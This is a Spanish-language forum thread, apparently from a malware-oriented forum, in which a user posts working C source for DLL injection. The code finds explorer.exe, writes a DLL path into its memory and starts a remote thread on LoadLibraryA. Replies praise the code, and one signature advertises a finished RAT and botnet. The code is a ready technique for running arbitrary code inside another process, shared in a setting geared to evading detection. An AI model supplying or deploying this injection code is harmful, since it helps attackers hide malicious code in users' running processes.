Bueno,primeramente quiero agradecer a Drinky94 por tomarse horas explicandome parámetros,y el funcionamiento de la Inyección DLL,algo todavía lejano.

Imagen

Código: Seleccionar todo

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <Tlhelp32.h>

int main(int argc, char *argv[])
{
    //Agradecimientos//
	//Drinky94: Por explicarme el funcionamiento de la Inyeccion y algunos parámetros.
	//e0n: porque gracias a su código deb CryptAPI para la Inyeccion en C++ logré compreder el real funcionamiento.
	///////////////////

PROCESSENTRY32 BloqueP;
	char RUTADLL[MAX_PATH] = "C:\\ladll.DLL";
    HANDLE RetEnum = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

Process32First(RetEnum,&BloqueP);
    while(Process32Next(RetEnum,&BloqueP)) //Hacemos un bucle para recorrer todos los procesos abiertos.
    {
      int comparacion = strcmp(BloqueP.szExeFile,"explorer.exe"); //Si el proceso actual es el explorer.exe
      if(comparacion == 0)
        {                        
          //Abrimos el Proceso y obtenemos su HANDLE	  
        HANDLE IDPROCESO = OpenProcess(PROCESS_ALL_ACCESS,0,BloqueP.th32ProcessID); 
             if(IDPROCESO != NULL){		
         //Obtenemos la Direccion de LoadLibrary con GetProcAdress y la guardamos para su posterior uso
        LPVOID Pare1 = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
		  //Creamos Espacio en el proceso y almacenamos el creado en la variable AB
        LPVOID AB = (LPVOID)VirtualAllocEx(IDPROCESO,NULL,strlen(RUTADLL),MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);
		//Escribimos en el proceso la ruta de nuestra dll con sus funciones
        WriteProcessMemory(IDPROCESO,(LPVOID)AB,RUTADLL,strlen(RUTADLL),NULL);
		 //Creamos un Thread en el proceso que ejecute la funcion de nuestra dll
        CreateRemoteThread(IDPROCESO,NULL,NULL,(LPTHREAD_START_ROUTINE)Pare1,(LPVOID)AB,NULL,NULL);
        return 1;                         
								  }
		}
     }
       CloseHandle(RetEnum);
       getchar();	
       return 0;
}
» [Enlace externo eliminado para invitados]

pass: indetectables.net

Finalmente,decir que el mérito es de Drinky94,sin el apenas me quedaría en VirtualAlloc.
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
esta dpm tio! me tengo q poner yo con C a tope jajaja

salu2 sigue asi ;)
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
Estos son los ejemplos que me gustan!
Gran trabajo Brothers , esta es una forma , vere si les dejo otro ejemplo.
obey escribió:Pues si tuviese mas edad todavia pero esqe perder la virginidad con tu profesora de informatica y que ademas tenga 50....
Hola, soy nuevo aqui, y se que el post ya es viejo pero me gustaria ver el source, agradeceria si lo pudieras volver a subir.
Responder

Volver a “Fuentes”